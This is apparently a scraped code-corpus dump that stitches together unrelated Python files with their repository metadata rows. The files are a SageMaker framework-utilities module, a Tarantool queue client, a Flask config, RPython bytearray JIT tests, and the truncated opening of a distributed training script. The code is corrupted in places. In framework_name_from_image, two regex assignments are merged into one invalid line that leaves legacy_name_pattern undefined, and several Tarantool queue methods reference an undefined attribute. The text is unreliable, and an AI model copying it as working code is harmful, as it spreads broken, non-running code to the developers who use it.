"enabled", False
)
if is_multi_gpu_instance and ps_enabled:
logger.warning(PARAMETER_SERVER_MULTI_GPU_WARNING)
def get_unsupported_framework_version_error(
framework_name, unsupported_version, supported_versions
):
"""Return error message for unsupported framework version.
This should also return the supported versions for customers.
:param framework_name:
:param unsupported_version:
:param supported_versions:
:return:
"""
return UNSUPPORTED_FRAMEWORK_VERSION_ERROR.format(
framework_name,
unsupported_version,
", ".join('"{}"'.format(version) for version in supported_versions),
)
def python_deprecation_warning(framework, latest_supported_version):
"""
Args:
framework:
latest_supported_version:
"""
return PYTHON_2_DEPRECATION_WARNING.format(
framework=framework, latest_supported_version=latest_supported_version
)
def parameter_v2_rename_warning(v1_parameter_name, v2_parameter_name):
"""
Args:
v1_parameter_name: parameter name used in SageMaker Python SDK v1
v2_parameter_name: parameter name used in SageMaker Python SDK v2
"""
return PARAMETER_V2_RENAME_WARNING.format(
v1_parameter_name=v1_parameter_name, v2_parameter_name=v2_parameter_name
)
def _region_supports_debugger(region_name):
"""Returns boolean indicating whether the region supports Amazon SageMaker Debugger.
Args:
region_name (str): Name of the region to check against.
Returns:
bool: Whether or not the region supports Amazon SageMaker Debugger.
"""
return region_name.lower() not in DEBUGGER_UNSUPPORTED_REGIONS
| 36.986994
| 186
| 0.675601
|
from __future__ import absolute_import
import logging
import os
import re
import shutil
import tempfile
from collections import namedtuple
import sagemaker.utils
from sagemaker import s3
from sagemaker.utils import get_ecr_image_uri_prefix, ECR_URI_PATTERN
logger = logging.getLogger("sagemaker")
_TAR_SOURCE_FILENAME = "source.tar.gz"
UploadedCode = namedtuple("UserCode", ["s3_prefix", "script_name"])
EMPTY_FRAMEWORK_VERSION_WARNING = (
"No framework_version specified, defaulting to version {}. "
"framework_version will be required in SageMaker Python SDK v2."
)
LATER_FRAMEWORK_VERSION_WARNING = (
"This is not the latest supported version. "
"If you would like to use version {latest}, "
"please add framework_version={latest} to your constructor."
)
PYTHON_2_DEPRECATION_WARNING = (
"{latest_supported_version} is the latest version of {framework} that supports "
"Python 2. Newer versions of {framework} will only be available for Python 3."
"Please set the argument \"py_version='py3'\" to use the Python 3 {framework} image."
)
PARAMETER_SERVER_MULTI_GPU_WARNING = (
"If you have selected a multi-GPU training instance type, "
"and have also enabled parameter server for distributed training. "
"Distributed training with the default parameter server configuration will not "
"fully leverage all GPU cores; the parameter server will be configured to run "
"only one worker per host regardless of the number of GPUs."
)
PARAMETER_V2_RENAME_WARNING = (
"Parameter {v1_parameter_name} will be renamed to {v2_parameter_name} "
"in SageMaker Python SDK v2."
)
EMPTY_FRAMEWORK_VERSION_ERROR = (
"framework_version is required for script mode estimator. "
"Please add framework_version={} to your constructor to avoid this error."
)
UNSUPPORTED_FRAMEWORK_VERSION_ERROR = (
"{} framework does not support version {}. Please use one of the following: {}."
)
VALID_PY_VERSIONS = ["py2", "py3", "py37"]
VALID_EIA_FRAMEWORKS = [
"tensorflow",
"tensorflow-serving",
"mxnet",
"mxnet-serving",
"pytorch-serving",
]
PY2_RESTRICTED_EIA_FRAMEWORKS = ["pytorch-serving"]
PY37_SUPPORTED_FRAMEWORKS = ["tensorflow-scriptmode"]
VALID_ACCOUNTS_BY_REGION = {
"us-gov-west-1": "246785580436",
"us-iso-east-1": "744548109606",
"cn-north-1": "422961961927",
"cn-northwest-1": "423003514399",
}
ASIMOV_VALID_ACCOUNTS_BY_REGION = {
"us-gov-west-1": "442386744353",
"us-iso-east-1": "886529160074",
"cn-north-1": "727897471807",
"cn-northwest-1": "727897471807",
}
OPT_IN_ACCOUNTS_BY_REGION = {"ap-east-1": "057415533634", "me-south-1": "724002660598"}
ASIMOV_OPT_IN_ACCOUNTS_BY_REGION = {"ap-east-1": "871362719292", "me-south-1": "217643126080"}
DEFAULT_ACCOUNT = "520713654638"
ASIMOV_PROD_ACCOUNT = "763104351884"
ASIMOV_DEFAULT_ACCOUNT = ASIMOV_PROD_ACCOUNT
SINGLE_GPU_INSTANCE_TYPES = ("ml.p2.xlarge", "ml.p3.2xlarge")
MERGED_FRAMEWORKS_REPO_MAP = {
"tensorflow-scriptmode": "tensorflow-training",
"tensorflow-serving": "tensorflow-inference",
"tensorflow-serving-eia": "tensorflow-inference-eia",
"mxnet": "mxnet-training",
"mxnet-serving": "mxnet-inference",
"mxnet-serving-eia": "mxnet-inference-eia",
"pytorch": "pytorch-training",
"pytorch-serving": "pytorch-inference",
"pytorch-serving-eia": "pytorch-inference-eia",
}
MERGED_FRAMEWORKS_LOWEST_VERSIONS = {
"tensorflow-scriptmode": {"py3": [1, 13, 1], "py2": [1, 14, 0], "py37": [1, 15, 2]},
"tensorflow-serving": [1, 13, 0],
"tensorflow-serving-eia": [1, 14, 0],
"mxnet": {"py3": [1, 4, 1], "py2": [1, 6, 0]},
"mxnet-serving": {"py3": [1, 4, 1], "py2": [1, 6, 0]},
"mxnet-serving-eia": [1, 4, 1],
"pytorch": [1, 2, 0],
"pytorch-serving": [1, 2, 0],
"pytorch-serving-eia": [1, 3, 1],
}
INFERENTIA_VERSION_RANGES = {
"neo-mxnet": [[1, 5, 1], [1, 5, 1]],
"neo-tensorflow": [[1, 15, 0], [1, 15, 0]],
}
INFERENTIA_SUPPORTED_REGIONS = ["us-east-1", "us-west-2"]
DEBUGGER_UNSUPPORTED_REGIONS = ["us-gov-west-1", "us-iso-east-1"]
def is_version_equal_or_higher(lowest_version, framework_version):
version_list = [int(s) for s in framework_version.split(".")]
return version_list >= lowest_version[0 : len(version_list)]
def is_version_equal_or_lower(highest_version, framework_version):
version_list = [int(s) for s in framework_version.split(".")]
return version_list <= highest_version[0 : len(version_list)]
def _is_dlc_version(framework, framework_version, py_version):
lowest_version_list = MERGED_FRAMEWORKS_LOWEST_VERSIONS.get(framework)
if isinstance(lowest_version_list, dict):
lowest_version_list = lowest_version_list[py_version]
if lowest_version_list:
return is_version_equal_or_higher(lowest_version_list, framework_version)
return False
def _is_inferentia_supported(framework, framework_version):
lowest_version_list = INFERENTIA_VERSION_RANGES.get(framework)[0]
highest_version_list = INFERENTIA_VERSION_RANGES.get(framework)[1]
return is_version_equal_or_higher(
lowest_version_list, framework_version
) and is_version_equal_or_lower(highest_version_list, framework_version)
def _registry_id(region, framework, py_version, account, framework_version):
if _is_dlc_version(framework, framework_version, py_version):
if region in ASIMOV_OPT_IN_ACCOUNTS_BY_REGION:
return ASIMOV_OPT_IN_ACCOUNTS_BY_REGION.get(region)
if region in ASIMOV_VALID_ACCOUNTS_BY_REGION:
return ASIMOV_VALID_ACCOUNTS_BY_REGION.get(region)
return ASIMOV_DEFAULT_ACCOUNT
if region in OPT_IN_ACCOUNTS_BY_REGION:
return OPT_IN_ACCOUNTS_BY_REGION.get(region)
return VALID_ACCOUNTS_BY_REGION.get(region, account)
def create_image_uri(
region,
framework,
instance_type,
framework_version,
py_version=None,
account=None,
accelerator_type=None,
optimized_families=None,
):
logger.warning(
"'create_image_uri' will be deprecated in favor of 'ImageURIProvider' class "
"in SageMaker Python SDK v2."
)
optimized_families = optimized_families or []
if py_version and py_version not in VALID_PY_VERSIONS:
raise ValueError("invalid py_version argument: {}".format(py_version))
if py_version == "py37" and framework not in PY37_SUPPORTED_FRAMEWORKS:
raise ValueError("{} does not support Python 3.7 at this time.".format(framework))
if _accelerator_type_valid_for_framework(
framework=framework,
py_version=py_version,
accelerator_type=accelerator_type,
optimized_families=optimized_families,
):
framework += "-eia"
if account is None:
account = _registry_id(
region=region,
framework=framework,
py_version=py_version,
account=DEFAULT_ACCOUNT,
framework_version=framework_version,
)
if instance_type.startswith("local"):
device_type = "cpu" if instance_type == "local" else "gpu"
elif not instance_type.startswith("ml."):
raise ValueError(
"{} is not a valid SageMaker instance type. See: "
"https://aws.amazon.com/sagemaker/pricing/instance-types/".format(instance_type)
)
else:
family = instance_type.split(".")[1]
if family in optimized_families:
device_type = family
elif family.startswith("inf"):
device_type = "inf"
elif family[0] in ["g", "p"]:
device_type = "gpu"
else:
device_type = "cpu"
if device_type == "inf":
if region not in INFERENTIA_SUPPORTED_REGIONS:
raise ValueError(
"Inferentia is not supported in region {}. Supported regions are {}".format(
region, ", ".join(INFERENTIA_SUPPORTED_REGIONS)
)
)
if framework not in INFERENTIA_VERSION_RANGES:
raise ValueError(
"Inferentia does not support {}. Currently it supports "
"MXNet and TensorFlow with more frameworks coming soon.".format(
framework.split("-")[-1]
)
)
if not _is_inferentia_supported(framework, framework_version):
raise ValueError(
"Inferentia is not supported with {} version {}.".format(
framework.split("-")[-1], framework_version
)
)
use_dlc_image = _is_dlc_version(framework, framework_version, py_version)
if not py_version or (use_dlc_image and framework == "tensorflow-serving-eia"):
tag = "{}-{}".format(framework_version, device_type)
else:
tag = "{}-{}-{}".format(framework_version, device_type, py_version)
if use_dlc_image:
ecr_repo = MERGED_FRAMEWORKS_REPO_MAP[framework]
else:
ecr_repo = "sagemaker-{}".format(framework)
return "{}/{}:{}".format(get_ecr_image_uri_prefix(account, region), ecr_repo, tag)
def _accelerator_type_valid_for_framework(
framework, py_version, accelerator_type=None, optimized_families=None
):
if accelerator_type is None:
return False
if py_version == "py2" and framework in PY2_RESTRICTED_EIA_FRAMEWORKS:
raise ValueError(
"{} is not supported with Amazon Elastic Inference in Python 2.".format(framework)
)
if framework not in VALID_EIA_FRAMEWORKS:
raise ValueError(
"{} is not supported with Amazon Elastic Inference. Currently only "
"Python-based TensorFlow, MXNet, PyTorch are supported.".format(framework)
)
if optimized_families:
raise ValueError("Neo does not support Amazon Elastic Inference.")
if (
not accelerator_type.startswith("ml.eia")
and not accelerator_type == "local_sagemaker_notebook"
):
raise ValueError(
"{} is not a valid SageMaker Elastic Inference accelerator type. "
"See: https://docs.aws.amazon.com/sagemaker/latest/dg/ei.html".format(accelerator_type)
)
return True
def validate_source_dir(script, directory):
if directory:
if not os.path.isfile(os.path.join(directory, script)):
raise ValueError(
'No file named "{}" was found in directory "{}".'.format(script, directory)
)
return True
def tar_and_upload_dir(
session,
bucket,
s3_key_prefix,
script,
directory=None,
dependencies=None,
kms_key=None,
s3_resource=None,
):
if directory and directory.lower().startswith("s3://"):
return UploadedCode(s3_prefix=directory, script_name=os.path.basename(script))
script_name = script if directory else os.path.basename(script)
dependencies = dependencies or []
key = "%s/sourcedir.tar.gz" % s3_key_prefix
tmp = tempfile.mkdtemp()
try:
source_files = _list_files_to_compress(script, directory) + dependencies
tar_file = sagemaker.utils.create_tar_file(
source_files, os.path.join(tmp, _TAR_SOURCE_FILENAME)
)
if kms_key:
extra_args = {"ServerSideEncryption": "aws:kms", "SSEKMSKeyId": kms_key}
else:
extra_args = None
if s3_resource is None:
s3_resource = session.resource("s3", region_name=session.region_name)
else:
print("Using provided s3_resource")
s3_resource.Object(bucket, key).upload_file(tar_file, ExtraArgs=extra_args)
finally:
shutil.rmtree(tmp)
return UploadedCode(s3_prefix="s3://%s/%s" % (bucket, key), script_name=script_name)
def _list_files_to_compress(script, directory):
if directory is None:
return [script]
basedir = directory if directory else os.path.dirname(script)
return [os.path.join(basedir, name) for name in os.listdir(basedir)]
def framework_name_from_image(image_name):
sagemaker_pattern = re.compile(ECR_URI_PATTERN)
sagemaker_match = sagemaker_pattern.match(image_name)
if sagemaker_match is None:
return None, None, None, None
name_pattern = re.compile(
r"^(?:sagemaker(?:-rl)?-)?(tensorflow|mxnet|chainer|pytorch|scikit-learn|xgboost)(?:-)?(scriptmode|training)?:(.*)-(.*?)-(py2|py3)$" = re.compile(r"^sagemaker-(tensorflow|mxnet)-(py2|py3)-(cpu|gpu):(.*)$")
name_match = name_pattern.match(sagemaker_match.group(9))
legacy_match = legacy_name_pattern.match(sagemaker_match.group(9))
if name_match is not None:
fw, scriptmode, ver, device, py = (
name_match.group(1),
name_match.group(2),
name_match.group(3),
name_match.group(4),
name_match.group(5),
)
return fw, py, "{}-{}-{}".format(ver, device, py), scriptmode
if legacy_match is not None:
return (legacy_match.group(1), legacy_match.group(2), legacy_match.group(4), None)
return None, None, None, None
def framework_version_from_tag(image_tag):
tag_pattern = re.compile("^(.*)-(cpu|gpu)-(py2|py3)$")
tag_match = tag_pattern.match(image_tag)
return None if tag_match is None else tag_match.group(1)
def parse_s3_url(url):
return s3.parse_s3_url(url)
def model_code_key_prefix(code_location_key_prefix, model_name, image):
training_job_name = sagemaker.utils.name_from_image(image)
return "/".join(filter(None, [code_location_key_prefix, model_name or training_job_name]))
def empty_framework_version_warning(default_version, latest_version):
msgs = [EMPTY_FRAMEWORK_VERSION_WARNING.format(default_version)]
if default_version != latest_version:
msgs.append(later_framework_version_warning(latest_version))
return " ".join(msgs)
def later_framework_version_warning(latest_version):
return LATER_FRAMEWORK_VERSION_WARNING.format(latest=latest_version)
def warn_if_parameter_server_with_multi_gpu(training_instance_type, distributions):
if training_instance_type == "local" or distributions is None:
return
is_multi_gpu_instance = (
training_instance_type == "local_gpu"
or training_instance_type.split(".")[1].startswith("p")
) and training_instance_type not in SINGLE_GPU_INSTANCE_TYPES
ps_enabled = "parameter_server" in distributions and distributions["parameter_server"].get(
"enabled", False
)
if is_multi_gpu_instance and ps_enabled:
logger.warning(PARAMETER_SERVER_MULTI_GPU_WARNING)
def get_unsupported_framework_version_error(
framework_name, unsupported_version, supported_versions
):
return UNSUPPORTED_FRAMEWORK_VERSION_ERROR.format(
framework_name,
unsupported_version,
", ".join('"{}"'.format(version) for version in supported_versions),
)
def python_deprecation_warning(framework, latest_supported_version):
return PYTHON_2_DEPRECATION_WARNING.format(
framework=framework, latest_supported_version=latest_supported_version
)
def parameter_v2_rename_warning(v1_parameter_name, v2_parameter_name):
return PARAMETER_V2_RENAME_WARNING.format(
v1_parameter_name=v1_parameter_name, v2_parameter_name=v2_parameter_name
)
def _region_supports_debugger(region_name):
return region_name.lower() not in DEBUGGER_UNSUPPORTED_REGIONS
| true
| true
|
1c3e9feb8acf4bdd8e0ad18e90e1fc824b44b79c
| 2,294
|
py
|
Python
|
sandbox/lib/jumpscale/JumpScale9/clients/tarantool/TarantoolQueue.py
|
Jumpscale/sandbox_linux
|
2aacd36b467ef30ac83718abfa82c6883b67a02f
|
[
"Apache-2.0"
] | null | null | null |
sandbox/lib/jumpscale/JumpScale9/clients/tarantool/TarantoolQueue.py
|
Jumpscale/sandbox_linux
|
2aacd36b467ef30ac83718abfa82c6883b67a02f
|
[
"Apache-2.0"
] | 1
|
2018-04-04T12:13:40.000Z
|
2018-05-03T07:57:52.000Z
|
sandbox/lib/jumpscale/JumpScale9/clients/tarantool/TarantoolQueue.py
|
Jumpscale/sandbox_linux
|
2aacd36b467ef30ac83718abfa82c6883b67a02f
|
[
"Apache-2.0"
] | null | null | null |
from js9 import j
import tarantool
from .TarantoolDB import TarantoolDB
# import itertools
# import sys
# sys.path.append(".")
# from tarantool_queue import *
import tarantool
JSBASE = j.application.jsbase_get_class()
class TarantoolQueue(JSBASE):
def __init__(self, tarantoolclient, name, ttl=0, delay=0):
"""The default connection parameters are: host='localhost', port=9999, db=0"""
JSBASE.__init__(self)
self.client = tarantoolclient
self.db = self.client.db
self.name = name
if ttl != 0:
raise RuntimeError("not implemented")
else:
try:
self.db.eval('queue.create_tube("%s","fifottl")' % name)
except Exception as e:
if "already exists" not in str(e):
raise RuntimeError(e)
def qsize(self):
"""Return the approximate size of the queue."""
return self.__db.llen(self.key)
def empty(self):
"""Return True if the queue is empty, False otherwise."""
return self.qsize() == 0
def put(self, item, ttl=None, delay=0):
"""Put item into the queue."""
args = {}
if ttl is not None:
args["ttl"] = ttl
args["delay"] = delay
self.db.call("queue.tube.%s:put" % self.name, item, args)
# else:
# #TODO: does not work yet? don't know how to pass
# self.db.call("queue.tube.%s:put"%self.name,item)
def get(self, timeout=1000, autoAcknowledge=True):
"""
Remove and return an item from the queue.
if necessary until an item is available.
"""
res = self.db.call("queue.tube.%s:take" % self.name, timeout)
if autoAcknowledge and len(res) > 0:
res = self.db.call("queue.tube.%s:ack" % self.name, res[0])
return res
def fetch(self, block=True, timeout=None):
""" Like get but without remove"""
if block:
item = self.__db.brpoplpush(self.key, self.key, timeout)
else:
item = self.__db.lindex(self.key, 0)
return item
def set_expire(self, time):
self.__db.expire(self.key, time)
def get_nowait(self):
"""Equivalent to get(False)."""
return self.get(False)
| 29.792208
| 86
| 0.576286
|
from js9 import j
import tarantool
from .TarantoolDB import TarantoolDB
import tarantool
JSBASE = j.application.jsbase_get_class()
class TarantoolQueue(JSBASE):
def __init__(self, tarantoolclient, name, ttl=0, delay=0):
JSBASE.__init__(self)
self.client = tarantoolclient
self.db = self.client.db
self.name = name
if ttl != 0:
raise RuntimeError("not implemented")
else:
try:
self.db.eval('queue.create_tube("%s","fifottl")' % name)
except Exception as e:
if "already exists" not in str(e):
raise RuntimeError(e)
def qsize(self):
return self.__db.llen(self.key)
def empty(self):
return self.qsize() == 0
def put(self, item, ttl=None, delay=0):
args = {}
if ttl is not None:
args["ttl"] = ttl
args["delay"] = delay
self.db.call("queue.tube.%s:put" % self.name, item, args)
self.name,item)
def get(self, timeout=1000, autoAcknowledge=True):
res = self.db.call("queue.tube.%s:take" % self.name, timeout)
if autoAcknowledge and len(res) > 0:
res = self.db.call("queue.tube.%s:ack" % self.name, res[0])
return res
def fetch(self, block=True, timeout=None):
if block:
item = self.__db.brpoplpush(self.key, self.key, timeout)
else:
item = self.__db.lindex(self.key, 0)
return item
def set_expire(self, time):
self.__db.expire(self.key, time)
def get_nowait(self):
return self.get(False)
| true
| true
|
1c3ea22503288aedcd8f44cb6c69cdf7b6831548
| 1,362
|
py
|
Python
|
config.py
|
ibbad/dna-lceb-web
|
b4c1d4e121dfea992e072979bfdc0f313c781e32
|
[
"Apache-2.0"
] | null | null | null |
config.py
|
ibbad/dna-lceb-web
|
b4c1d4e121dfea992e072979bfdc0f313c781e32
|
[
"Apache-2.0"
] | null | null | null |
config.py
|
ibbad/dna-lceb-web
|
b4c1d4e121dfea992e072979bfdc0f313c781e32
|
[
"Apache-2.0"
] | null | null | null |
"""
Configuration file for the application.
"""
import os
from helpers.helper_functions import generate_secret_key
basedir = os.path.abspath(os.path.dirname(__file__))
class Config:
SECRET_KEY = os.environ.get('SECRET_KEY') or generate_secret_key()
SSL_DISABLE = False
CSRF_ENABLED = False
@staticmethod
def init_app(app):
pass
class TestingConfig(Config):
TESTING = True
WTF_CSRF_ENABLED = False
class DevelopmentConfig(Config):
DEBUG = True
class ProductionConfig(Config):
@classmethod
def init_app(cls, app):
Config.init_app(app)
# email errors to the administrators
class HerokuConfig(ProductionConfig):
SSL_DISABLE = bool(os.environ.get('SSL_DISABLE'))
@classmethod
def init_app(cls, app):
ProductionConfig.init_app(app)
# handle proxy server headers
from werkzeug.contrib.fixers import ProxyFix
app.wsgi_app = ProxyFix(app.wsgi_app)
# log to stderr
import logging
from logging import StreamHandler
file_handler = StreamHandler()
file_handler.setLevel(logging.WARNING)
app.logger.addHandler(file_handler)
config = {
'development': DevelopmentConfig,
'testing': TestingConfig,
'heroku': HerokuConfig,
'production': ProductionConfig,
'default': DevelopmentConfig
}
| 21.619048
| 70
| 0.69163
|
import os
from helpers.helper_functions import generate_secret_key
basedir = os.path.abspath(os.path.dirname(__file__))
class Config:
SECRET_KEY = os.environ.get('SECRET_KEY') or generate_secret_key()
SSL_DISABLE = False
CSRF_ENABLED = False
@staticmethod
def init_app(app):
pass
class TestingConfig(Config):
TESTING = True
WTF_CSRF_ENABLED = False
class DevelopmentConfig(Config):
DEBUG = True
class ProductionConfig(Config):
@classmethod
def init_app(cls, app):
Config.init_app(app)
class HerokuConfig(ProductionConfig):
SSL_DISABLE = bool(os.environ.get('SSL_DISABLE'))
@classmethod
def init_app(cls, app):
ProductionConfig.init_app(app)
from werkzeug.contrib.fixers import ProxyFix
app.wsgi_app = ProxyFix(app.wsgi_app)
import logging
from logging import StreamHandler
file_handler = StreamHandler()
file_handler.setLevel(logging.WARNING)
app.logger.addHandler(file_handler)
config = {
'development': DevelopmentConfig,
'testing': TestingConfig,
'heroku': HerokuConfig,
'production': ProductionConfig,
'default': DevelopmentConfig
}
| true
| true
|
1c3ea2273509fcdf5847621ef551c86264756c7a
| 2,224
|
py
|
Python
|
rpython/jit/metainterp/test/test_bytearray.py
|
nanjekyejoannah/pypy
|
e80079fe13c29eda7b2a6b4cd4557051f975a2d9
|
[
"Apache-2.0",
"OpenSSL"
] | 381
|
2018-08-18T03:37:22.000Z
|
2022-02-06T23:57:36.000Z
|
rpython/jit/metainterp/test/test_bytearray.py
|
nanjekyejoannah/pypy
|
e80079fe13c29eda7b2a6b4cd4557051f975a2d9
|
[
"Apache-2.0",
"OpenSSL"
] | 16
|
2018-09-22T18:12:47.000Z
|
2022-02-22T20:03:59.000Z
|
rpython/jit/metainterp/test/test_bytearray.py
|
nanjekyejoannah/pypy
|
e80079fe13c29eda7b2a6b4cd4557051f975a2d9
|
[
"Apache-2.0",
"OpenSSL"
] | 55
|
2015-08-16T02:41:30.000Z
|
2022-03-20T20:33:35.000Z
|
import py
from rpython.jit.metainterp.test.support import LLJitMixin
from rpython.rlib.jit import JitDriver, dont_look_inside
class TestByteArray(LLJitMixin):
def test_getitem(self):
x = bytearray("foobar")
def fn(n):
assert n >= 0
return x[n]
res = self.interp_operations(fn, [3])
assert res == ord('b')
def test_getitem_negative(self):
x = bytearray("foobar")
def fn(n):
return x[n]
res = self.interp_operations(fn, [-2])
assert res == ord('a')
def test_len(self):
x = bytearray("foobar")
def fn(n):
return len(x)
res = self.interp_operations(fn, [3])
assert res == 6
def test_setitem(self):
@dont_look_inside
def make_me():
return bytearray("foobar")
def fn(n):
assert n >= 0
x = make_me()
x[n] = 3
return x[3] + 1000 * x[4]
res = self.interp_operations(fn, [3])
assert res == 3 + 1000 * ord('a')
def test_setitem_negative(self):
@dont_look_inside
def make_me():
return bytearray("foobar")
def fn(n):
x = make_me()
x[n] = 3
return x[3] + 1000 * x[4]
res = self.interp_operations(fn, [-2])
assert res == ord('b') + 1000 * 3
def test_new_bytearray(self):
def fn(n, m):
x = bytearray(str(n))
x[m] = 0x34
return int(str(x))
assert fn(610978, 3) == 610478
res = self.interp_operations(fn, [610978, 3])
assert res == 610478
def test_slice(self):
py.test.skip("XXX later")
def fn(n, m):
x = bytearray(str(n))
x = x[1:5]
x[m] = 0x35
return int(str(x))
res = self.interp_operations(fn, [610978, 1])
assert res == 1597
def test_bytearray_from_bytearray(self):
def fn(n, m):
x = bytearray(str(n))
y = bytearray(x)
x[m] = 0x34
return int(str(x)) + int(str(y))
res = self.interp_operations(fn, [610978, 3])
assert res == 610478 + 610978
| 26.795181
| 58
| 0.504946
|
import py
from rpython.jit.metainterp.test.support import LLJitMixin
from rpython.rlib.jit import JitDriver, dont_look_inside
class TestByteArray(LLJitMixin):
def test_getitem(self):
x = bytearray("foobar")
def fn(n):
assert n >= 0
return x[n]
res = self.interp_operations(fn, [3])
assert res == ord('b')
def test_getitem_negative(self):
x = bytearray("foobar")
def fn(n):
return x[n]
res = self.interp_operations(fn, [-2])
assert res == ord('a')
def test_len(self):
x = bytearray("foobar")
def fn(n):
return len(x)
res = self.interp_operations(fn, [3])
assert res == 6
def test_setitem(self):
@dont_look_inside
def make_me():
return bytearray("foobar")
def fn(n):
assert n >= 0
x = make_me()
x[n] = 3
return x[3] + 1000 * x[4]
res = self.interp_operations(fn, [3])
assert res == 3 + 1000 * ord('a')
def test_setitem_negative(self):
@dont_look_inside
def make_me():
return bytearray("foobar")
def fn(n):
x = make_me()
x[n] = 3
return x[3] + 1000 * x[4]
res = self.interp_operations(fn, [-2])
assert res == ord('b') + 1000 * 3
def test_new_bytearray(self):
def fn(n, m):
x = bytearray(str(n))
x[m] = 0x34
return int(str(x))
assert fn(610978, 3) == 610478
res = self.interp_operations(fn, [610978, 3])
assert res == 610478
def test_slice(self):
py.test.skip("XXX later")
def fn(n, m):
x = bytearray(str(n))
x = x[1:5]
x[m] = 0x35
return int(str(x))
res = self.interp_operations(fn, [610978, 1])
assert res == 1597
def test_bytearray_from_bytearray(self):
def fn(n, m):
x = bytearray(str(n))
y = bytearray(x)
x[m] = 0x34
return int(str(x)) + int(str(y))
res = self.interp_operations(fn, [610978, 3])
assert res == 610478 + 610978
| true
| true
|
1c3ea39888e2088ce257dfe36ae474d9f6acca2d
| 42,615
|
py
|
Python
|
pair_fast_forecast_distributed/pairwise_fusion_kd/train_faf_com_kd.py
|
Chezacar/CollaborationWithLatency
|
da06abea16f1ffcafc35d27cb69ae3116a345965
|
[
"MIT"
] | null | null | null |
pair_fast_forecast_distributed/pairwise_fusion_kd/train_faf_com_kd.py
|
Chezacar/CollaborationWithLatency
|
da06abea16f1ffcafc35d27cb69ae3116a345965
|
[
"MIT"
] | null | null | null |
pair_fast_forecast_distributed/pairwise_fusion_kd/train_faf_com_kd.py
|
Chezacar/CollaborationWithLatency
|
da06abea16f1ffcafc35d27cb69ae3116a345965
|
[
"MIT"
] | null | null | null |
# Copyright 2021 MediaBrain Group of CMIC, Shanghai Jiao Tong University. All right reserved.
# The software, documentation and/or data in this file is provided on an "as is" basis,
# and MediaBrain Group has no obligations to provide maintenance, support, updates, enhancements or modifications.
# MediaBrain Group specifically disclaims any warranties, including, but not limited to,
# the implied warranties of merchantability and fitness for any particular purpose.
# In no event shall MediaBrain Group be liable to any party for direct, indirect, special, incidental,
# or consequential damages, including lost profits, arising out of the use of this software
# and its documentation, even if MediaBrain Group has been advised of the possibility of such damages.
# As more fully described in the license agreement that was required in order to download this software,
# documentation and/or data, permission to use, copy and modify this software without fee is granted,
# but only for educational, research and non-commercial purposes.
from utils.model import forcast_lstm
import random
import torch
import torch.nn as nn
import torch.optim as optim
import torch.nn.functional as F
from torch.nn.parallel import DistributedDataParallel as DDP
import torch.distributed as dist
import torch.multiprocessing as mp
import numpy as np
import time
import sys
import argparse
import os
from shutil import copytree, copy
from utils.model import MotionNet
from utils.FaFModule import *
from utils.loss import *
from data.data_com_parallel import NuscenesDataset, CarscenesDataset
from data.config_com import Config, ConfigGlobal
from utils.mean_ap import eval_map
from tqdm import tqdm
class AverageMeter(object):
"""Computes and stores the average and current value"""
def __init__(self, name, fmt=':f'):
self.name = name
self.fmt = fmt
self.reset()
def reset(self):
self.val = 0
self.avg = 0
self.sum = 0
self.count = 0
def update(self, val, n=1):
self.val = val
self.sum += val * n
self.count += n
self.avg = self.sum / self.count
def __str__(self):
fmtstr = '{name} {val' + self.fmt + '} ({avg' + self.fmt + '})'
return fmtstr.format(**self.__dict__)
def check_folder(folder_path):
if not os.path.exists(folder_path):
os.mkdir(folder_path)
return folder_path
# def setup(rank = -1, world_size = -1):
# os.environ['MASTER_ADDR'] = 'localhost'
# os.environ['MASTER_PORT'] = '12355'
# dist.init_process_group("gloo", rank=rank, world_size=world_size)
# def cleanup():
# dist.destroy_process_group()
# def main_worker(gpu, para_list):
def main(config, config_global, args):
# [ngpus_per_node,config, config_global, args] = para_list
# args.gpu = gpu
# args.rank = args.rank * ngpus_per_node + gpu
# dist.init_process_group(backend='nccl', init_method='tcp://127.0.0.1:23456', world_size=ngpus_per_node, rank=gpu)
# torch.cuda.set_device(args.rank)
num_epochs = args.nepoch
need_log = args.log
num_workers = args.nworker
only_load_model = args.model_only
forcast_num = args.forcast_num
start_epoch = 1
# communicate a single layer [0: 32*256*256, 1: 64*128*128, 2: 128*64*64, 3: 256*32*32, 4: 512*16*16] [C, W, H]
layer = args.layer
batch_size = args.batch
# Specify gpu device
# device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
# device_num = torch.cuda.device_count()
# print("device number", device_num)
# torch.cuda.set_device(6)
os.environ['MASTER_ADDR'] = 'localhost'
os.environ['MASTER_PORT'] = '5678'
dist.init_process_group(backend='nccl',rank=1,world_size=2)
torch.cuda.set_device(2)
if args.mode == 'train':
# Whether to log the training information
if need_log:
logger_root = args.logpath if args.logpath != '' else 'logs'
time_stamp = time.strftime("%Y-%m-%d_%H-%M-%S")
if args.resume == '':
model_save_path = check_folder(logger_root)
model_save_path = check_folder(os.path.join(model_save_path, 'train_single_seq'))
model_save_path = check_folder(os.path.join(model_save_path, time_stamp))
log_file_name = os.path.join(model_save_path, 'log.txt')
saver = open(log_file_name, "w")
saver.write("GPU number: {}\n".format(torch.cuda.device_count()))
saver.flush()
# Logging the details for this experiment
saver.write("command line: {}\n".format(" ".join(sys.argv[0:])))
saver.write(args.__repr__() + "\n\n")
saver.flush()
# Copy the code files as logs
copytree('nuscenes-devkit', os.path.join(model_save_path, 'nuscenes-devkit'))
copytree('data', os.path.join(model_save_path, 'data'))
python_files = [f for f in os.listdir('.') if f.endswith('.py')]
for f in python_files:
copy(f, model_save_path)
else:
model_save_path = args.resume[:args.resume.rfind('/')]
torch.load(args.resume) # eg, "logs/train_multi_seq/1234-56-78-11-22-33"
log_file_name = os.path.join(model_save_path, 'log.txt')
saver = open(log_file_name, "a")
saver.write("GPU number: {}\n".format(torch.cuda.device_count()))
saver.flush()
# Logging the details for this experiment
saver.write("command line: {}\n".format(" ".join(sys.argv[1:])))
saver.write(args.__repr__() + "\n\n")
saver.flush()
# load data from multiple agents
data_nuscenes = NuscenesDataset(dataset_root=args.data + '/agent0', split='train', config=config)
padded_voxel_points_example, label_one_hot_example, reg_target_example, reg_loss_mask_example, \
anchors_map_example, motion_one_hot_example, motion_mask_example, vis_maps_example = data_nuscenes[0]
trainset = CarscenesDataset(padded_voxel_points_example, label_one_hot_example, reg_target_example,
reg_loss_mask_example, \
anchors_map_example, motion_one_hot_example, motion_mask_example, vis_maps_example,
dataset_root=args.data, config=config, config_global=config_global, agent_list = ['/agent0', '/agent1', '/agent2', '/agent3', '/agent4'],
split='train', forcast_num = forcast_num)
# trainset0 = CarscenesDataset(padded_voxel_points_example, label_one_hot_example, reg_target_example,
